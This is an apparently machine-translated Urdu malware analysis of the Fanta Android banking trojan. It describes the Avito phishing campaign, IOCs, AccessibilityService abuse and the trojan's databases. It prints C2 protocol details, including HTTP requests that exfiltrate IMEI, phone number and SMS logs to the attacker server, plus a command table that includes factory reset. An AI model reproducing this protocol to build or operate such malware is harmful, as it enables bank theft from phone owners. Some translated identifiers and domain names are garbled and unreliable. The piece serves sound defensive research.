🥇 Leisya, Fanta: پرانے Android Trojan کے نئے حربے

ایک دن آپ Avito پر کچھ بیچنا چاہتے ہیں اور، آپ کے پروڈکٹ کی تفصیلی وضاحت پوسٹ کرنے کے بعد (مثال کے طور پر، ایک RAM ماڈیول)، آپ کو یہ پیغام موصول ہوگا:

ایک بار جب آپ لنک کھولیں گے، آپ کو ایک بظاہر بے ضرر صفحہ نظر آئے گا جو آپ کو، خوش اور کامیاب بیچنے والے کو مطلع کرے گا کہ خریداری کی گئی ہے:

ایک بار جب آپ "جاری رکھیں" بٹن پر کلک کریں گے، تو آپ کے Android ڈیوائس پر ایک آئیکن اور اعتماد کو متاثر کرنے والے نام کے ساتھ ایک APK فائل ڈاؤن لوڈ ہو جائے گی۔ آپ نے ایک ایپلیکیشن انسٹال کی جس نے کسی وجہ سے AccessibilityService کے حقوق کی درخواست کی، پھر کچھ ونڈوز نمودار ہوئیں اور جلدی سے غائب ہو گئیں اور... بس۔

آپ اپنا بیلنس چیک کرنے جاتے ہیں، لیکن کسی وجہ سے آپ کی بینکنگ ایپ آپ کے کارڈ کی تفصیلات دوبارہ مانگتی ہے۔ ڈیٹا داخل کرنے کے بعد، کچھ خوفناک ہوتا ہے: کسی وجہ سے آپ کے لیے ابھی تک واضح نہیں ہے، پیسے آپ کے اکاؤنٹ سے غائب ہونے لگتے ہیں۔ آپ مسئلہ کو حل کرنے کی کوشش کر رہے ہیں، لیکن آپ کا فون مزاحمت کرتا ہے: یہ "بیک" اور "ہوم" کیز کو دباتا ہے، بند نہیں ہوتا اور آپ کو کسی بھی حفاظتی اقدامات کو چالو کرنے کی اجازت نہیں دیتا ہے۔ نتیجے کے طور پر، آپ کو پیسے کے بغیر چھوڑ دیا گیا ہے، آپ کا سامان خریدا نہیں گیا ہے، آپ الجھن میں ہیں اور حیران ہیں: کیا ہوا؟

جواب آسان ہے: آپ Flexnet خاندان کے رکن، Android Trojan Fanta کا شکار ہو گئے ہیں۔ یہ کیسے ہوا؟ آئیے اب وضاحت کرتے ہیں۔

مصنفین: اینڈری پولووینکنمالویئر تجزیہ میں جونیئر ماہر، ایوان پساریف، مالویئر تجزیہ میں ماہر۔

کچھ اعدادوشمار۔

Android Trojans کا Flexnet خاندان پہلی بار 2015 میں مشہور ہوا۔ سرگرمی کے کافی عرصے کے دوران، خاندان کئی ذیلی اقسام میں پھیل گیا: فانٹا، لیمبوٹ، لپٹن، وغیرہ۔ ٹروجن کے ساتھ ساتھ اس سے منسلک بنیادی ڈھانچہ بھی کھڑا نہیں ہے: نئی موثر ڈسٹری بیوشن اسکیمیں تیار کی جارہی ہیں - ہمارے معاملے میں، اعلیٰ معیار کے فشنگ پیجز جن کا مقصد ایک مخصوص صارف بیچنے والا ہے، اور ٹروجن ڈویلپرز فیشن کے رجحانات کی پیروی کرتے ہیں۔ وائرس لکھنا - نئی فعالیت شامل کرنا جس سے متاثرہ آلات سے زیادہ موثر طریقے سے رقم چوری کرنا اور تحفظ کے طریقہ کار کو نظرانداز کرنا ممکن ہو جاتا ہے۔

اس مضمون میں بیان کردہ مہم کا مقصد روس کے صارفین کے لیے ہے؛ یوکرین میں متاثرہ آلات کی ایک چھوٹی سی تعداد ریکارڈ کی گئی، اور قازقستان اور بیلاروس میں اس سے بھی کم۔

اگرچہ Flexnet 4 سال سے زیادہ عرصے سے اینڈرائیڈ ٹروجن کے میدان میں ہے اور بہت سے محققین نے اس کا تفصیل سے مطالعہ کیا ہے، یہ اب بھی اچھی حالت میں ہے۔ جنوری 2019 سے، نقصان کی ممکنہ رقم 35 ملین روبل سے زیادہ ہے - اور یہ صرف روس میں مہمات کے لیے ہے۔ 2015 میں اس اینڈرائیڈ ٹروجن کے مختلف ورژنز انڈر گراؤنڈ فورمز پر فروخت کیے گئے تھے جہاں تفصیلی وضاحت کے ساتھ ٹروجن کا سورس کوڈ بھی مل سکتا تھا۔ اس کا مطلب ہے کہ دنیا میں ہونے والے نقصانات کے اعدادوشمار اور بھی زیادہ متاثر کن ہیں۔ اس طرح کے ایک بوڑھے آدمی کے لئے برا اشارہ نہیں ہے، ہے نا؟

فروخت سے دھوکہ تک

جیسا کہ اشتہارات Avito پوسٹ کرنے کے لیے انٹرنیٹ سروس کے لیے ایک فشنگ پیج کے پہلے پیش کیے گئے اسکرین شاٹ سے دیکھا جا سکتا ہے، یہ ایک مخصوص شکار کے لیے تیار کیا گیا تھا۔ بظاہر، حملہ آور Avito کے تجزیہ کاروں میں سے ایک استعمال کرتے ہیں، جو بیچنے والے کا فون نمبر اور نام کے ساتھ ساتھ پروڈکٹ کی تفصیل بھی نکالتا ہے۔ صفحہ کو پھیلانے اور اے پی کے فائل کی تیاری کے بعد، متاثرہ شخص کو اس کے نام کے ساتھ ایک ایس ایم ایس بھیجا جاتا ہے اور ایک فشنگ پیج کا لنک بھیجا جاتا ہے جس میں اس کی پروڈکٹ کی تفصیل اور پروڈکٹ کی "فروخت" سے حاصل ہونے والی رقم ہوتی ہے۔ بٹن پر کلک کرنے سے، صارف کو ایک بدنیتی پر مبنی APK فائل - Fanta موصول ہوتی ہے۔

shcet491[.]ru ڈومین کے مطالعے سے پتہ چلتا ہے کہ اسے Hostinger کے DNS سرورز کے حوالے کیا گیا ہے:

ns1.hostinger.ru
ns2.hostinger.ru
ns3.hostinger.ru
ns4.hostinger.ru

ڈومین زون فائل میں آئی پی ایڈریس 31.220.23[.]236، 31.220.23[.]243، اور 31.220.23[.]235 کی طرف اشارہ کرنے والے اندراجات شامل ہیں۔ تاہم، ڈومین کا بنیادی وسائل کا ریکارڈ (A ریکارڈ) IP ایڈریس 178.132.1[.]240 والے سرور کی طرف اشارہ کرتا ہے۔

IP ایڈریس 178.132.1[.]240 نیدرلینڈز میں واقع ہے اور میزبان سے تعلق رکھتا ہے ورلڈ اسٹریم. IP پتے 31.220.23[.]235, 31.220.23[.]236 اور 31.220.23[.]243 برطانیہ میں واقع ہیں اور مشترکہ ہوسٹنگ سرور HOSTINGER سے تعلق رکھتے ہیں۔ ریکارڈر کے طور پر استعمال کیا جاتا ہے۔ openprov-ru. درج ذیل ڈومینز نے IP ایڈریس 178.132.1 پر بھی حل کیا[.]240:

sdelka-ru[.]ru
tovar-av[.]ru
av-tovar[.]ru
ru-sdelka[.]ru
shcet382[.]ru
sdelka221[.]ru
sdelka211[.]ru
vyplata437[.]ru
viplata291[.]ru
perevod273[.]ru
perevod901[.]ru

واضح رہے کہ درج ذیل فارمیٹ میں لنکس تقریباً تمام ڈومینز سے دستیاب تھے۔

http://(www.){0,1}<%domain%>/[0-9]{7}

اس ٹیمپلیٹ میں ایک SMS پیغام کا لنک بھی شامل ہے۔ تاریخی اعداد و شمار کی بنیاد پر، یہ پایا گیا کہ ایک ڈومین اوپر بیان کردہ پیٹرن میں کئی لنکس سے مطابقت رکھتا ہے، جو اس بات کی نشاندہی کرتا ہے کہ ایک ڈومین ٹروجن کو متعدد متاثرین میں تقسیم کرنے کے لیے استعمال کیا گیا تھا۔

آئیے تھوڑا سا آگے بڑھتے ہیں: ایس ایم ایس کے لنک کے ذریعے ڈاؤن لوڈ کردہ ٹروجن ایڈریس کو کنٹرول سرور کے طور پر استعمال کرتا ہے۔ onusedseddohap[.] کلب. یہ ڈومین 2019-03-12 کو رجسٹر ہوا تھا، اور 2019-04-29 سے شروع ہونے والے، APK ایپلی کیشنز نے اس ڈومین کے ساتھ بات چیت کی۔ VirusTotal سے حاصل کردہ ڈیٹا کی بنیاد پر، کل 109 ایپلی کیشنز نے اس سرور کے ساتھ بات چیت کی۔ ڈومین نے خود ہی IP ایڈریس کو حل کیا۔ 217.23.14[.]27, نیدرلینڈز میں واقع ہے اور میزبان کی ملکیت ہے۔ ورلڈ اسٹریم. ریکارڈر کے طور پر استعمال کیا جاتا ہے۔ نام چیپ. ڈومینز نے بھی اس IP ایڈریس کو حل کیا ہے۔ بیڈ ریکون [.] کلب (2018-09-25 سے شروع) اور برا ریکون[.] لائیو (2018-10-25 سے شروع)۔ ڈومین کے ساتھ بیڈ ریکون [.] کلب 80 سے زیادہ APK فائلوں کے ساتھ بات چیت ہوئی۔ برا ریکون[.] لائیو - 100 سے زیادہ۔

عام طور پر، حملہ اس طرح ہوتا ہے:

فانٹا کے ڈھکن کے نیچے کیا ہے؟

بہت سے دوسرے اینڈرائیڈ ٹروجنز کی طرح، فانٹا ایس ایم ایس پیغامات کو پڑھنے اور بھیجنے، یو ایس ایس ڈی کی درخواستیں کرنے، اور ایپلیکیشنز کے اوپر اپنی ونڈوز ڈسپلے کرنے کے قابل ہے (بشمول بینکنگ والے)۔ تاہم، اس خاندان کی فعالیت کا ہتھیار آ گیا ہے: Fanta استعمال کرنا شروع کر دیا رسائی کی خدمت مختلف مقاصد کے لیے: دیگر ایپلیکیشنز سے اطلاعات کے مواد کو پڑھنا، پتہ لگانے سے روکنا اور کسی متاثرہ ڈیوائس پر ٹروجن کے عمل کو روکنا، وغیرہ۔ Fanta Android کے 4.4 سے کم عمر کے تمام ورژنز پر کام کرتا ہے۔ اس مضمون میں ہم مندرجہ ذیل Fanta نمونے پر گہری نظر ڈالیں گے۔

MD5: 0826bd11b2c130c4c8ac137e395ac2d4
SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

لانچ کے فوراً بعد

لانچ کے فوراً بعد، ٹروجن اپنا آئیکن چھپا لیتا ہے۔ ایپلیکیشن صرف اس صورت میں کام کر سکتی ہے جب متاثرہ ڈیوائس کا نام فہرست میں نہ ہو:

android_x86
VirtualBox
Nexus 5X (بل ہیڈ)
Nexus 5(استرا)

یہ چیک ٹروجن کی مرکزی خدمت میں کیا جاتا ہے۔ مین سروس. جب پہلی بار لانچ کیا جاتا ہے تو، ایپلیکیشن کے کنفیگریشن پیرامیٹرز کو ڈیفالٹ ویلیوز پر شروع کیا جاتا ہے (کنفیگریشن ڈیٹا کو اسٹور کرنے کا فارمیٹ اور ان کے معنی پر بعد میں بات کی جائے گی)، اور کنٹرول سرور پر ایک نیا متاثرہ ڈیوائس رجسٹرڈ ہوتا ہے۔ پیغام کی قسم کے ساتھ ایک HTTP POST درخواست سرور کو بھیجی جائے گی۔ رجسٹر_بوٹ اور متاثرہ ڈیوائس کے بارے میں معلومات (Android ورژن، IMEI، فون نمبر، آپریٹر کا نام اور ملک کا کوڈ جس میں آپریٹر رجسٹرڈ ہے)۔ پتہ کنٹرول سرور کے طور پر کام کرتا ہے۔ hXXp://onuseseddohap[.]club/controller.php. جواب میں، سرور فیلڈز پر مشتمل ایک پیغام بھیجتا ہے۔ bot_id, bot_pwd, سرور - ایپلیکیشن ان اقدار کو CnC سرور کے پیرامیٹرز کے طور پر محفوظ کرتی ہے۔ پیرامیٹر سرور اختیاری اگر فیلڈ موصول نہیں ہوا: فانٹا رجسٹریشن ایڈریس استعمال کرتا ہے - hXXp://onuseseddohap[.]club/controller.php. CnC ایڈریس کو تبدیل کرنے کے فنکشن کو دو مسائل کو حل کرنے کے لیے استعمال کیا جا سکتا ہے: کئی سرورز کے درمیان بوجھ کو یکساں طور پر تقسیم کرنے کے لیے (اگر وہاں زیادہ تعداد میں متاثرہ ڈیوائسز ہوں تو، غیر موزوں ویب سرور پر بوجھ زیادہ ہو سکتا ہے)، اور استعمال کرنے کے لیے۔ CnC سرورز میں سے کسی ایک کی ناکامی کی صورت میں ایک متبادل سرور۔

اگر درخواست بھیجتے وقت کوئی خرابی پیش آتی ہے، تو ٹروجن 20 سیکنڈ کے بعد رجسٹریشن کے عمل کو دہرائے گا۔

ڈیوائس کے کامیابی سے رجسٹر ہونے کے بعد، Fanta صارف کو درج ذیل پیغام دکھائے گا:

اہم نوٹ: سروس کال کی گئی۔ سسٹم سیکورٹی - ٹروجن سروس کا نام، اور بٹن پر کلک کرنے کے بعد ٹھیک ہے متاثرہ ڈیوائس کی ایکسیسبیلٹی سیٹنگز کے ساتھ ایک ونڈو کھلے گی، جہاں صارف کو نقصان دہ سروس کے لیے ایکسیسبیلٹی کے حقوق دینے چاہئیں:

جیسے ہی صارف آن کرتا ہے۔ رسائی کی خدمت، فانٹا ایپلیکیشن ونڈوز کے مواد اور ان میں انجام پانے والے اعمال تک رسائی حاصل کرتا ہے:

رسائی کے حقوق حاصل کرنے کے فوراً بعد، ٹروجن ایڈمنسٹریٹر کے حقوق اور اطلاعات کو پڑھنے کے حقوق کی درخواست کرتا ہے:

AccessibilityService کا استعمال کرتے ہوئے، ایپلی کیشن کلیدی اسٹروک کی نقل کرتی ہے، اس طرح خود کو تمام ضروری حقوق فراہم کرتی ہے۔

Fanta متعدد ڈیٹا بیس مثالیں بناتا ہے (جس کی تفصیل بعد میں کی جائے گی) کنفیگریشن ڈیٹا کے ساتھ ساتھ متاثرہ ڈیوائس کے بارے میں اس عمل میں جمع کی گئی معلومات کو ذخیرہ کرنے کے لیے ضروری ہے۔ جمع کردہ معلومات بھیجنے کے لیے، ٹروجن ایک دہرانے والا کام تخلیق کرتا ہے جسے ڈیٹا بیس سے فیلڈز ڈاؤن لوڈ کرنے اور کنٹرول سرور سے کمانڈ حاصل کرنے کے لیے ڈیزائن کیا گیا ہے۔ CnC تک رسائی کا وقفہ اینڈرائیڈ ورژن کی بنیاد پر سیٹ کیا گیا ہے: 5.1 کی صورت میں، وقفہ 10 سیکنڈ ہوگا، ورنہ 60 سیکنڈ۔

کمانڈ حاصل کرنے کے لیے، فانٹا ایک درخواست کرتا ہے۔ GetTask مینجمنٹ سرور پر۔ جواب میں، CnC درج ذیل میں سے ایک کمانڈ بھیج سکتا ہے۔

ٹیم	تفصیل
0	ایس ایم ایس پیغام بھیجیں۔
1	فون کال کریں یا یو ایس ایس ڈی کمانڈ کریں۔
2	پیرامیٹر کو اپ ڈیٹ کرتا ہے۔ وقفہ
3	پیرامیٹر کو اپ ڈیٹ کرتا ہے۔ ٹوہ لگانا
6	پیرامیٹر کو اپ ڈیٹ کرتا ہے۔ ایس ایم ایس مینیجر
9	SMS پیغامات جمع کرنا شروع کریں۔
11	اپنے فون کو فیکٹری سیٹنگز پر ری سیٹ کریں۔
12	ڈائیلاگ باکس کی تخلیق کی لاگنگ کو فعال/غیر فعال کریں۔

فانٹا 70 بینکنگ ایپس، تیز ادائیگی کے نظام اور ای والٹس سے بھی اطلاعات اکٹھا کرتی ہے اور انہیں ڈیٹا بیس میں محفوظ کرتی ہے۔

ترتیب کے پیرامیٹرز کو ذخیرہ کرنا

کنفیگریشن پیرامیٹرز کو ذخیرہ کرنے کے لیے، فانٹا اینڈرائیڈ پلیٹ فارم کے لیے ایک معیاری طریقہ استعمال کرتا ہے۔ ترجیحات-فائلوں. سیٹنگز نام کی فائل میں محفوظ ہو جائیں گی۔ ترتیبات. محفوظ کردہ پیرامیٹرز کی تفصیل نیچے دی گئی جدول میں ہے۔

نام	پہلے سے طے شدہ قیمت	ممکنہ اقدار	تفصیل
id	0	انٹیگر	بوٹ ID
سرور	hXXp://onuseseddohap[.]club/	URL	کنٹرول سرور ایڈریس
پی ڈبلیو ڈی	-	سلک	سرور کا پاس ورڈ
وقفہ	20	انٹیگر	وقت وقفہ. اس بات کی نشاندہی کرتا ہے کہ درج ذیل کاموں کو کب تک موخر کیا جانا چاہیے: بھیجے گئے SMS پیغام کی حیثیت کے بارے میں درخواست بھیجتے وقت مینجمنٹ سرور سے ایک نئی کمانڈ وصول کرنا
ٹوہ لگانا	تمام	تمام/ٹیل نمبر	اگر فیلڈ تار کے برابر ہے۔ تمام یا ٹیلی نمبر، پھر موصول ہونے والے SMS پیغام کو ایپلیکیشن کے ذریعے روکا جائے گا اور صارف کو نہیں دکھایا جائے گا۔
ایس ایم ایس مینیجر	0	0/1	ایپلیکیشن کو بطور ڈیفالٹ SMS وصول کنندہ فعال/غیر فعال کریں۔
پڑھیں ڈائیلاگ	جھوٹی	درست غلط	ایونٹ لاگنگ کو فعال/غیر فعال کریں۔ ایکسیسبیلٹی ایونٹ

فانٹا فائل بھی استعمال کرتا ہے۔ ایس ایم ایس مینیجر:

نام	پہلے سے طے شدہ قیمت	ممکنہ اقدار	تفصیل
pckg	-	سلک	ایس ایم ایس میسج مینیجر کا نام استعمال کیا گیا۔

ڈیٹا بیس کے ساتھ تعامل

اپنے آپریشن کے دوران، ٹروجن دو ڈیٹا بیس استعمال کرتا ہے۔ ڈیٹا بیس کا نام دیا گیا۔ a فون سے جمع کی گئی مختلف معلومات کو ذخیرہ کرنے کے لیے استعمال کیا جاتا ہے۔ دوسرے ڈیٹا بیس کا نام ہے۔ fanta.db اور بینک کارڈز کے بارے میں معلومات جمع کرنے کے لیے ڈیزائن کردہ فشنگ ونڈوز بنانے کے لیے ذمہ دار ترتیبات کو محفوظ کرنے کے لیے استعمال کیا جاتا ہے۔

ٹروجن ڈیٹا بیس کا استعمال کرتا ہے۔ а جمع کی گئی معلومات کو ذخیرہ کرنے اور اپنے اعمال کو لاگ کرنے کے لیے۔ ڈیٹا ٹیبل میں محفوظ ہے۔ نوشتہ جات. ٹیبل بنانے کے لیے درج ذیل SQL استفسار کا استعمال کریں:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

ڈیٹا بیس درج ذیل معلومات پر مشتمل ہے:

1. ایک پیغام کے ساتھ متاثرہ ڈیوائس کے آغاز کو لاگ کرنا فون آن کر دیا!

2. ایپلیکیشنز سے اطلاعات۔ پیغام درج ذیل ٹیمپلیٹ کے مطابق تیار کیا گیا ہے:

(<%App Name%>)<%Title%>: <%Notification text%>

3. ٹروجن کے ذریعہ بنائے گئے فشنگ فارموں سے بینک کارڈ کا ڈیٹا۔ پیرامیٹر VIEW_NAME مندرجہ ذیل میں سے ایک ہو سکتا ہے:

AliExpress کی
ایوٹو
گوگل کھیلیں
متفرق

پیغام اس فارمیٹ میں لاگ ان ہے:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. فارمیٹ میں آنے والے/جانے والے SMS پیغامات:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. اس پیکج کے بارے میں معلومات جو ڈائیلاگ باکس کو فارمیٹ میں بناتا ہے:

(<%Package name%>)<%Package information%>

مثال کی میز نوشتہ جات:

Fanta کی فعالیت میں سے ایک بینک کارڈ کے بارے میں معلومات کا مجموعہ ہے۔ بینکنگ ایپلیکیشنز کھولتے وقت ڈیٹا اکٹھا کرنا فشنگ ونڈوز کی تخلیق کے ذریعے ہوتا ہے۔ ٹروجن فشنگ ونڈو صرف ایک بار بناتا ہے۔ وہ معلومات جو ونڈو صارف کو دکھائی گئی تھی ایک ٹیبل میں محفوظ ہے۔ ترتیبات ڈیٹا بیس میں fanta.db. ڈیٹا بیس بنانے کے لیے درج ذیل SQL استفسار کا استعمال کریں:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

تمام ٹیبل فیلڈز ترتیبات پہلے سے طے شدہ طور پر 1 پر شروع کیا گیا (ایک فشنگ ونڈو بنائیں)۔ صارف کے اپنا ڈیٹا داخل کرنے کے بعد، قدر 0 پر سیٹ ہو جائے گی۔ ٹیبل فیلڈز کی مثال ترتیبات:

لاگ ان کر سکتے ہیں۔ - بینک کی درخواست کھولتے وقت فارم کو ظاہر کرنے کے لیے فیلڈ ذمہ دار ہے۔
پہلا_بینک - استعمال نہیں کیا
can_avito — Avito ایپلیکیشن کھولتے وقت فارم کو ظاہر کرنے کے لیے فیلڈ ذمہ دار ہے۔
can_ali — Aliexpress ایپلیکیشن کھولتے وقت فارم کو ظاہر کرنے کے لیے فیلڈ ذمہ دار ہے۔
ایک اور کر سکتے ہیں۔ - فہرست سے کسی بھی درخواست کو کھولتے وقت فارم کو ظاہر کرنے کے لیے فیلڈ ذمہ دار ہے: یولا، پانڈاؤ، ڈرم آٹو، والیٹ۔ ڈسکاؤنٹ اور بونس کارڈز، Aviasales، بکنگ، Trivago
can_card - فیلڈ کھولتے وقت فارم کو ظاہر کرنے کے لیے ذمہ دار ہے۔ گوگل کھیلیں

مینجمنٹ سرور کے ساتھ تعامل

مینجمنٹ سرور کے ساتھ نیٹ ورک کا تعامل HTTP پروٹوکول کے ذریعے ہوتا ہے۔ نیٹ ورک کے ساتھ کام کرنے کے لیے، Fanta مقبول Retrofit لائبریری کا استعمال کرتا ہے۔ درخواستیں بھیجی جاتی ہیں: hXXp://onuseseddohap[.]club/controller.php. سرور پر رجسٹر ہوتے وقت سرور کا پتہ تبدیل کیا جا سکتا ہے۔ کوکیز سرور سے جواب میں بھیجی جا سکتی ہیں۔ فانٹا سرور سے درج ذیل درخواستیں کرتا ہے:

کنٹرول سرور پر بوٹ کی رجسٹریشن پہلی بار لانچ ہونے پر ہوتی ہے۔ متاثرہ ڈیوائس کے بارے میں درج ذیل ڈیٹا سرور کو بھیجا جاتا ہے:
· کوکی - سرور سے موصول ہونے والی کوکیز (پہلے سے طے شدہ قیمت ایک خالی سٹرنگ ہے)
· موڈ - مسلسل تار رجسٹر_بوٹ
· prefix - عدد مستقل 2
· ورژن_sdk - مندرجہ ذیل ٹیمپلیٹ کے مطابق تشکیل دیا گیا ہے: /(Avit)
· IMEI - متاثرہ ڈیوائس کا IMEI
· ملک - اس ملک کا کوڈ جس میں آپریٹر رجسٹرڈ ہے، ISO فارمیٹ میں
· تعداد - فون نمبر
· آپریٹر - آپریٹر کا نام

سرور کو بھیجی گئی درخواست کی ایک مثال:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
```
درخواست کے جواب میں، سرور کو JSON آبجیکٹ واپس کرنا چاہیے جس میں درج ذیل پیرامیٹرز ہوں:
bot_id - متاثرہ آلے کی شناخت۔ اگر bot_id 0 کے برابر ہے، تو Fanta درخواست پر دوبارہ عمل کرے گا۔
bot_pwd - سرور کے لیے پاس ورڈ۔
سرور - سرور ایڈریس کو کنٹرول کریں۔ اختیاری پیرامیٹر۔ اگر پیرامیٹر کی وضاحت نہیں کی گئی ہے تو، درخواست میں محفوظ کردہ پتہ استعمال کیا جائے گا۔

مثال JSON آبجیکٹ:
```
{
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}
```

سرور سے کمانڈ وصول کرنے کی درخواست کریں۔ درج ذیل ڈیٹا سرور کو بھیجا جاتا ہے:
· کوکی - سرور سے موصول ہونے والی کوکیز
· بولی - متاثرہ ڈیوائس کی شناخت جو درخواست بھیجتے وقت موصول ہوئی تھی۔ رجسٹر_بوٹ
· پی ڈبلیو ڈی سرور کے لیے پاس ورڈ
· divice_admin - فیلڈ اس بات کا تعین کرتی ہے کہ آیا منتظم کے حقوق حاصل کیے گئے ہیں۔ اگر منتظم کے حقوق حاصل کیے گئے ہیں، تو میدان برابر ہے۔ 1ورنہ 0
· رسائی - قابل رسائی سروس کے آپریشن کی حیثیت۔ اگر سروس شروع کی گئی تھی، تو قدر ہے۔ 1ورنہ 0
· ایس ایم ایس مینیجر — دکھاتا ہے کہ آیا ٹروجن ایس ایم ایس وصول کرنے کے لیے ڈیفالٹ ایپلیکیشن کے طور پر فعال ہے۔
· سکرین - دکھاتا ہے کہ اسکرین کس حالت میں ہے۔ قیمت مقرر کی جائے گی۔ 1، اگر اسکرین آن ہے، ورنہ 0;

سرور کو بھیجی گئی درخواست کی ایک مثال:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
```
کمانڈ پر منحصر ہے، سرور مختلف پیرامیٹرز کے ساتھ JSON آبجیکٹ واپس کر سکتا ہے:

· ٹیم ایس ایم ایس پیغام بھیجیں۔: پیرامیٹرز میں فون نمبر، ایس ایم ایس پیغام کا متن اور بھیجے جانے والے پیغام کی شناخت ہوتی ہے۔ ٹائپ کے ساتھ سرور کو پیغام بھیجتے وقت شناخت کنندہ استعمال کیا جاتا ہے۔ setSmsStatus.
```
{
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}
```
· ٹیم فون کال کریں یا یو ایس ایس ڈی کمانڈ کریں۔: فون نمبر یا کمانڈ ریسپانس باڈی میں آتا ہے۔
```
{
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}
```
· ٹیم وقفہ پیرامیٹر تبدیل کریں۔.
```
{
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}
```
· ٹیم انٹرسیپٹ پیرامیٹر کو تبدیل کریں۔.
```
{
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}
```
· ٹیم SmsManager فیلڈ کو تبدیل کریں۔.
```
{
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```
· ٹیم متاثرہ آلے سے SMS پیغامات جمع کریں۔.
```
{
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}
```
· ٹیم اپنے فون کو فیکٹری سیٹنگز پر ری سیٹ کریں۔:
```
{
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}
```
· ٹیم ReadDialog پیرامیٹر کو تبدیل کریں۔.
```
{
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```

قسم کے ساتھ پیغام بھیجنا setSmsStatus. یہ درخواست کمانڈ پر عمل درآمد کے بعد کی جاتی ہے۔ ایس ایم ایس پیغام بھیجیں۔. درخواست اس طرح نظر آتی ہے:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

ڈیٹا بیس کے مواد کو اپ لوڈ کرنا۔ ایک قطار فی درخواست منتقل کی جاتی ہے۔ درج ذیل ڈیٹا سرور کو بھیجا جاتا ہے:
· کوکی - سرور سے موصول ہونے والی کوکیز
· موڈ - مسلسل تار سیٹ سیو ان باکس ایس ایم ایس
· بولی - متاثرہ ڈیوائس کی شناخت جو درخواست بھیجتے وقت موصول ہوئی تھی۔ رجسٹر_بوٹ
· متن - موجودہ ڈیٹا بیس ریکارڈ میں متن (فیلڈ d میز سے نوشتہ جات ڈیٹا بیس میں а)
· تعداد - موجودہ ڈیٹا بیس ریکارڈ کا نام (فیلڈ p میز سے نوشتہ جات ڈیٹا بیس میں а)
· sms_mode - عددی قدر (فیلڈ m میز سے نوشتہ جات ڈیٹا بیس میں а)

درخواست اس طرح نظر آتی ہے:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
```
اگر کامیابی کے ساتھ سرور کو بھیج دیا جاتا ہے، تو قطار کو ٹیبل سے حذف کر دیا جائے گا۔ سرور کے ذریعہ واپس کردہ JSON آبجیکٹ کی مثال:
```
{
    "response":[],
    "status":"ok"
}
```

AccessibilityService کے ساتھ تعامل

AccessibilityService کو معذور افراد کے لیے اینڈرائیڈ ڈیوائسز کا استعمال آسان بنانے کے لیے لاگو کیا گیا تھا۔ زیادہ تر معاملات میں، کسی درخواست کے ساتھ تعامل کرنے کے لیے جسمانی تعامل کی ضرورت ہوتی ہے۔ AccessibilityService آپ کو انہیں پروگرام کے مطابق کرنے کی اجازت دیتی ہے۔ Fanta بینکنگ ایپلی کیشنز میں جعلی ونڈوز بنانے اور صارفین کو سسٹم سیٹنگز اور کچھ ایپلیکیشنز کو کھولنے سے روکنے کے لیے سروس کا استعمال کرتا ہے۔

